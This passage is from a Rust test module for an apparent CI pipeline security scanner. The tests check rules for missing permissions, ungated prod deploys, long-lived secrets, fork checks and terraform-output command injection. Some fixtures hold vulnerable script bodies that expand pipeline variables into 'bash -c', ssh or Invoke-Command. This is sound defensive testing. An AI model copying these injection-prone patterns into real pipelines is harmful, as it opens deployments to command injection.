fn no_workflow_perms_does_not_fire_when_a_job_declares_permissions() {
// Workflow has no top-level permissions, but one job does — the rule
// must not fire because the per-job override is what runs.
let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
g.metadata
.insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
let mut meta = std::collections::HashMap::new();
meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN (build)",
TrustZone::FirstParty,
meta,
);
let findings = no_workflow_level_permissions_block(&g);
assert!(findings.is_empty());
}
#[test]
fn no_workflow_perms_does_not_fire_on_ado_or_gitlab() {
let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
g.metadata
.insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
assert!(no_workflow_level_permissions_block(&g).is_empty());
let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
g.metadata
.insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
assert!(no_workflow_level_permissions_block(&g).is_empty());
}
// ── prod_deploy_job_no_environment_gate ───────────────────
#[test]
fn prod_deploy_no_env_gate_fires_on_ado_prod_sc_without_env_marker() {
let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
step_with_meta(
&mut g,
"AzureCLI : Deploy",
&[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
);
let findings = prod_deploy_job_no_environment_gate(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert_eq!(
findings[0].category,
FindingCategory::ProdDeployJobNoEnvironmentGate
);
assert!(findings[0].message.contains("platform-prod-sc"));
}
#[test]
fn prod_deploy_no_env_gate_skips_when_env_marker_present() {
let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
step_with_meta(
&mut g,
"AzureCLI : Deploy",
&[
(META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
(META_ENV_APPROVAL, "true"),
],
);
assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
}
#[test]
fn prod_deploy_no_env_gate_skips_dev_connection() {
let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
step_with_meta(
&mut g,
"AzureCLI : Deploy",
&[(META_SERVICE_CONNECTION_NAME, "platform-dev-sc")],
);
assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
}
#[test]
fn prod_deploy_no_env_gate_via_edge_to_prod_identity() {
let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
let step = step_with_meta(&mut g, "AzureCLI : Deploy", &[]);
let mut id_meta = std::collections::HashMap::new();
id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
let conn = g.add_node_with_metadata(
NodeKind::Identity,
"alz-infra-sc-prd-uks",
TrustZone::FirstParty,
id_meta,
);
g.add_edge(step, conn, EdgeKind::HasAccessTo);
let findings = prod_deploy_job_no_environment_gate(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
}
// ── long_lived_secret_without_oidc_recommendation ─────────
#[test]
fn ll_secret_without_oidc_emits_for_aws_secret_with_no_oidc_in_graph() {
let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
let findings = long_lived_secret_without_oidc_recommendation(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Info);
assert!(matches!(
findings[0].recommendation,
Recommendation::FederateIdentity { .. }
));
}
#[test]
fn ll_secret_without_oidc_skips_when_oidc_identity_present() {
let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
let mut meta = std::collections::HashMap::new();
meta.insert(META_OIDC.into(), "true".into());
g.add_node_with_metadata(
NodeKind::Identity,
"AWS/deploy-role",
TrustZone::FirstParty,
meta,
);
assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
}
#[test]
fn ll_secret_without_oidc_skips_unrecognised_secret_names() {
let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
g.add_node(NodeKind::Secret, "INTERNAL_KEY", TrustZone::FirstParty);
// Not AWS/GCP/Azure-shaped — no actionable OIDC migration path.
assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
}
// ── pull_request_workflow_inconsistent_fork_check ─────────
#[test]
fn inconsistent_fork_check_fires_when_one_job_guarded_one_unguarded() {
let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
g.metadata
.insert(META_TRIGGER.into(), "pull_request".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
let s_guarded = step_with_meta(
&mut g,
"build[0]",
&[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
);
let s_unguarded = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
g.add_edge(s_guarded, secret, EdgeKind::HasAccessTo);
g.add_edge(s_unguarded, secret, EdgeKind::HasAccessTo);
let findings = pull_request_workflow_inconsistent_fork_check(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].category,
FindingCategory::PullRequestWorkflowInconsistentForkCheck
);
assert!(findings[0].message.contains("deploy"));
assert!(findings[0].message.contains("build"));
}
#[test]
fn inconsistent_fork_check_skips_when_all_jobs_guarded() {
let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
g.metadata
.insert(META_TRIGGER.into(), "pull_request".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
let s1 = step_with_meta(
&mut g,
"build[0]",
&[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
);
let s2 = step_with_meta(
&mut g,
"deploy[0]",
&[(META_JOB_NAME, "deploy"), (META_FORK_CHECK, "true")],
);
g.add_edge(s1, secret, EdgeKind::HasAccessTo);
g.add_edge(s2, secret, EdgeKind::HasAccessTo);
assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
}
#[test]
fn inconsistent_fork_check_skips_when_no_job_guarded() {
// Both unguarded → not "inconsistent" (the org never tried). Other
// rules cover the underlying risk.
let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
g.metadata
.insert(META_TRIGGER.into(), "pull_request".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
let s1 = step_with_meta(&mut g, "build[0]", &[(META_JOB_NAME, "build")]);
let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
g.add_edge(s1, secret, EdgeKind::HasAccessTo);
g.add_edge(s2, secret, EdgeKind::HasAccessTo);
assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
}
// ── terraform_output_via_setvariable_shell_expansion ─────
/// Helper: add a Step node tagged with the given job and an inline
/// script body. Returns the node id so the caller can wire it up.
fn add_script_step_in_job(g: &mut AuthorityGraph, name: &str, job: &str, body: &str) -> NodeId {
let mut meta = std::collections::HashMap::new();
meta.insert(META_SCRIPT_BODY.into(), body.into());
meta.insert(META_JOB_NAME.into(), job.into());
g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, meta)
}
#[test]
fn tf_output_setvariable_fires_on_solarwinds_corpus_pattern() {
// Faithful reproduction of the
// `Azure_Landing_Zone/sharedservice-solarwinds/.pipeline/deployment.yml`
// pattern (lines ~98-180 of the corpus exemplar): a PowerShell@2
// step reads `$env:TF_OUT_GDSVMS` and emits
// `##vso[task.setvariable variable=gdsvms]`. A later
// AzurePowerShell@5 step does `"$(gdsvms)" -split ","` followed by
// `Invoke-Command` against each VM in the list.
let mut g = AuthorityGraph::new(source("ado.yml"));
add_script_step_in_job(
&mut g,
"capture-tf-outputs",
"Deployment_Apply",
"Write-Host \"TF_OUT_GDSVMS: $env:TF_OUT_GDSVMS\"\n\
Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"\n\
Write-Host \"##vso[task.setvariable variable=amlinvms]$env:TF_OUT_AMLINVMS\"",
);
add_script_step_in_job(
&mut g,
"join-vms-to-domain",
"Deployment_Apply",
"$GDSvmNames = \"$(gdsvms)\" -split \",\"\n\
foreach ($vmName in $GDSvmNames) {\n\
Invoke-Command -ComputerName $vmName -ScriptBlock { Add-Computer }\n\
}",
);
let findings = terraform_output_via_setvariable_shell_expansion(&g);
// Two captured variables (gdsvms, amlinvms) but only `gdsvms` is
// referenced in the sink — exactly one finding.
assert_eq!(findings.len(), 1, "got: {findings:#?}");
assert_eq!(findings[0].severity, Severity::High);
assert_eq!(
findings[0].category,
FindingCategory::TerraformOutputViaSetvariableShellExpansion
);
assert!(findings[0].message.contains("gdsvms"));
assert!(findings[0].nodes_involved.len() == 2);
}
#[test]
fn tf_output_setvariable_fires_on_literal_terraform_output_cli() {
// Variant: the capture step actually shells out to
// `terraform output -raw vm_names` instead of going through the
// `TF_OUT_*` env-var convention. Sink uses bash -c "$(NAME)".
let mut g = AuthorityGraph::new(source("ado.yml"));
add_script_step_in_job(
&mut g,
"tf-capture",
"deploy",
"VMS=$(terraform output -raw vm_names)\n\
echo \"##vso[task.setvariable variable=vms;]$VMS\"",
);
add_script_step_in_job(
&mut g,
"tf-consume",
"deploy",
"bash -c \"for vm in $(vms); do ssh $vm uptime; done\"",
);
let findings = terraform_output_via_setvariable_shell_expansion(&g);
assert_eq!(findings.len(), 1, "got: {findings:#?}");
assert!(findings[0].message.contains("vms"));
}
#[test]
fn tf_output_setvariable_skips_when_only_phase_one_present() {
// Capture step exists, but no later step in the same job ever
// references the captured variable in shell-expansion position.
let mut g = AuthorityGraph::new(source("ado.yml"));
add_script_step_in_job(
&mut g,
"capture",
"deploy",
"Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
);
add_script_step_in_job(
&mut g,
"innocuous-print",
"deploy",
"Write-Host 'Deployment complete.'",
);
let findings = terraform_output_via_setvariable_shell_expansion(&g);
assert!(
findings.is_empty(),
"phase-1-only must not fire; got: {findings:#?}"
);
}
#[test]
fn tf_output_setvariable_skips_when_only_phase_two_present() {
// Sink step uses $(gdsvms) in shell-expansion position, but no
// earlier step in the same job ever captured a terraform output
// and emitted a setvariable for that name. Variable might be
// defined elsewhere (variable group, vars yaml) — out of scope.
let mut g = AuthorityGraph::new(source("ado.yml"));
add_script_step_in_job(&mut g, "noop-first", "deploy", "echo 'starting deploy'");
add_script_step_in_job(
&mut g,
"consume-only",
"deploy",
"$names = \"$(gdsvms)\" -split \",\"\n\
foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
);
let findings = terraform_output_via_setvariable_shell_expansion(&g);
assert!(
findings.is_empty(),
"phase-2-only must not fire; got: {findings:#?}"
);
}
#[test]
fn inconsistent_fork_check_skips_non_pr_trigger() {
let mut g = graph_with_platform("github-actions", ".github/workflows/push.yml");
g.metadata.insert(META_TRIGGER.into(), "push".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
let s1 = step_with_meta(
&mut g,
"build[0]",
&[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
);
let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
g.add_edge(s1, secret, EdgeKind::HasAccessTo);
g.add_edge(s2, secret, EdgeKind::HasAccessTo);
assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
}
// ── gitlab_deploy_job_missing_protected_branch_only ────────
#[test]
fn gitlab_deploy_no_protected_only_fires_on_prod_env_without_marker() {
let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
step_with_meta(&mut g, "deploy-prod", &[("environment_name", "production")]);
let findings = gitlab_deploy_job_missing_protected_branch_only(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert_eq!(
findings[0].category,
FindingCategory::GitlabDeployJobMissingProtectedBranchOnly
);
}
#[test]
fn gitlab_deploy_no_protected_only_skips_when_marker_present() {
let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
step_with_meta(
&mut g,
"deploy-prod",
&[
("environment_name", "production"),
(META_RULES_PROTECTED_ONLY, "true"),
],
);
assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
}
#[test]
fn gitlab_deploy_no_protected_only_skips_dev_environment() {
let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
step_with_meta(&mut g, "deploy-staging", &[("environment_name", "staging")]);
assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
}
// ── compensating-control suppressions ─────────────────────
#[test]
fn suppression_checkout_pr_downgraded_when_no_privileged_steps_in_job() {
// Build a graph where checkout_self_pr_exposure would fire BUT the
// job has no secret access and no env-gate writes.
let mut g = graph_with_platform("github-actions", ".github/workflows/lint.yml");
g.metadata
.insert(META_TRIGGER.into(), "pull_request_target".into());
let _checkout = step_with_meta(
&mut g,
"lint[0]",
&[(META_JOB_NAME, "lint"), (META_CHECKOUT_SELF, "true")],
);
// A second non-privileged step in the same job.
step_with_meta(&mut g, "lint[1]", &[(META_JOB_NAME, "lint")]);
let mut findings = checkout_self_pr_exposure(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High); // pre-suppression
apply_compensating_controls(&g, &mut findings);
assert_eq!(
findings[0].severity,
Severity::Info,
"checkout in a job with no privileged steps must downgrade to Info"
);
assert!(findings[0].message.contains("downgraded"));
}
#[test]
fn suppression_checkout_pr_unchanged_when_job_has_privileged_step() {
let mut g = graph_with_platform("github-actions", ".github/workflows/build.yml");
g.metadata
.insert(META_TRIGGER.into(), "pull_request_target".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
let checkout = step_with_meta(
&mut g,
"build[0]",
&[(META_JOB_NAME, "build"), (META_CHECKOUT_SELF, "true")],
);
let priv_step = step_with_meta(&mut g, "build[1]", &[(META_JOB_NAME, "build")]);
g.add_edge(priv_step, secret, EdgeKind::HasAccessTo);
// checkout step itself has no edges
let _ = checkout;
let mut findings = checkout_self_pr_exposure(&g);
assert_eq!(findings.len(), 1);
let pre = findings[0].severity;
apply_compensating_controls(&g, &mut findings);
assert_eq!(
findings[0].severity, pre,
"must NOT downgrade when same job has privileged steps"
);
}
#[test]
fn suppression_trigger_context_downgraded_when_all_priv_jobs_fork_checked() {
// pull_request_target trigger + every privileged step has fork-check.
let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
g.metadata
.insert(META_TRIGGER.into(), "pull_request_target".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
let s = step_with_meta(
&mut g,
"build[0]",
&[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
);
g.add_edge(s, secret, EdgeKind::HasAccessTo);
let mut findings = trigger_context_mismatch(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
apply_compensating_controls(&g, &mut findings);
assert_eq!(
findings[0].severity,
Severity::Medium,
"trigger_context_mismatch must downgrade Critical → Medium when fork-check universal"
);
assert!(findings[0].message.contains("downgraded"));
}
#[test]
fn suppression_trigger_context_unchanged_when_some_priv_steps_unguarded() {
let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
g.metadata
.insert(META_TRIGGER.into(), "pull_request_target".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
let s_guard = step_with_meta(
&mut g,
"build[0]",
&[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
);
let s_no_guard = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
g.add_edge(s_guard, secret, EdgeKind::HasAccessTo);
g.add_edge(s_no_guard, secret, EdgeKind::HasAccessTo);
let mut findings = trigger_context_mismatch(&g);
let pre = findings[0].severity;
apply_compensating_controls(&g, &mut findings);
assert_eq!(findings[0].severity, pre);
}
#[test]
fn suppression_overpriv_identity_demoted_when_job_has_narrow_override() {
// Workflow-level GITHUB_TOKEN is broad; one job has constrained override.
let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
let mut wf_meta = std::collections::HashMap::new();
wf_meta.insert(META_PERMISSIONS.into(), "write-all".into());
wf_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
let wf_token = g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN",
TrustZone::FirstParty,
wf_meta,
);
let mut job_meta = std::collections::HashMap::new();
job_meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
job_meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN (build)",
TrustZone::FirstParty,
job_meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, wf_token, EdgeKind::HasAccessTo);
let mut findings = over_privileged_identity(&g);
// Filter to only the workflow-level finding (the constrained job-level
// override won't fire over_privileged_identity by itself).
let wf_findings_count = findings
.iter()
.filter(|f| {
f.nodes_involved
.first()
.and_then(|id| g.node(*id))
.map(|n| n.name == "GITHUB_TOKEN")
.unwrap_or(false)
})
.count();
assert_eq!(wf_findings_count, 1);
apply_compensating_controls(&g, &mut findings);
let demoted = findings.iter().find(|f| {
f.nodes_involved
.first()
.and_then(|id| g.node(*id))
.map(|n| n.name == "GITHUB_TOKEN")
.unwrap_or(false)
});
let demoted = demoted.expect("workflow-level token finding still present");
assert_eq!(
demoted.severity,
Severity::Info,
"workflow-level over_priv must downgrade to Info when narrower job override exists"
);
assert!(demoted.message.contains("suppressed"));
}
#[test]
fn tf_output_setvariable_skips_when_sink_quotes_in_env_block() {
// Sink step references `$(gdsvms)` only in `echo "$(gdsvms)"` —
// a context with no shell-expansion sigils (no bash -c, no eval,
// no Invoke-Command, no -split, no command substitution, not
// line-leading). The value is quoted by the shell on its way
// into echo's argv and never reaches an interpreter.
let mut g = AuthorityGraph::new(source("ado.yml"));
add_script_step_in_job(
&mut g,
"capture",
"deploy",
"Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
);
add_script_step_in_job(
&mut g,
"safe-echo",
"deploy",
"echo \"gdsvms is: $(gdsvms)\"",
);
let findings = terraform_output_via_setvariable_shell_expansion(&g);
assert!(
findings.is_empty(),
"properly-quoted echo must not fire; got: {findings:#?}"
);
}
#[test]
fn tf_output_setvariable_skips_when_sink_in_different_job() {
// Capture and sink exist, but in different jobs. Pipeline
// variable scoping in ADO is per-stage/per-job by default — the
// chain doesn't compose without explicit cross-job output
// wiring (which is a separate primitive).
let mut g = AuthorityGraph::new(source("ado.yml"));
add_script_step_in_job(
&mut g,
"capture",
"job-a",
"Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
);
add_script_step_in_job(
&mut g,
"consume",
"job-b",
"$names = \"$(gdsvms)\" -split \",\"\n\
foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
);
let findings = terraform_output_via_setvariable_shell_expansion(&g);
assert!(
findings.is_empty(),
"cross-job chain must not fire; got: {findings:#?}"
);
}
#[test]
fn tf_output_setvariable_skips_when_setvariable_lacks_tf_capture_signal() {
// Inline script emits `task.setvariable` but the source value is
// a plain pipeline variable, not anything terraform-shaped.
// Without a TF_OUT_* / `terraform output` capture signal in the
// body, the rule must not fire — `self_mutating_pipeline`
// already covers the generic setvariable primitive.
let mut g = AuthorityGraph::new(source("ado.yml"));
add_script_step_in_job(
&mut g,
"pure-setvar",
"deploy",
"Write-Host \"##vso[task.setvariable variable=gdsvms]$(BuildId)\"",
);
add_script_step_in_job(
&mut g,
"consume",
"deploy",
"$names = \"$(gdsvms)\" -split \",\"\n\
foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
);
let findings = terraform_output_via_setvariable_shell_expansion(&g);
assert!(
findings.is_empty(),
"setvariable without terraform-output signal must not fire; got: {findings:#?}"
);
}
}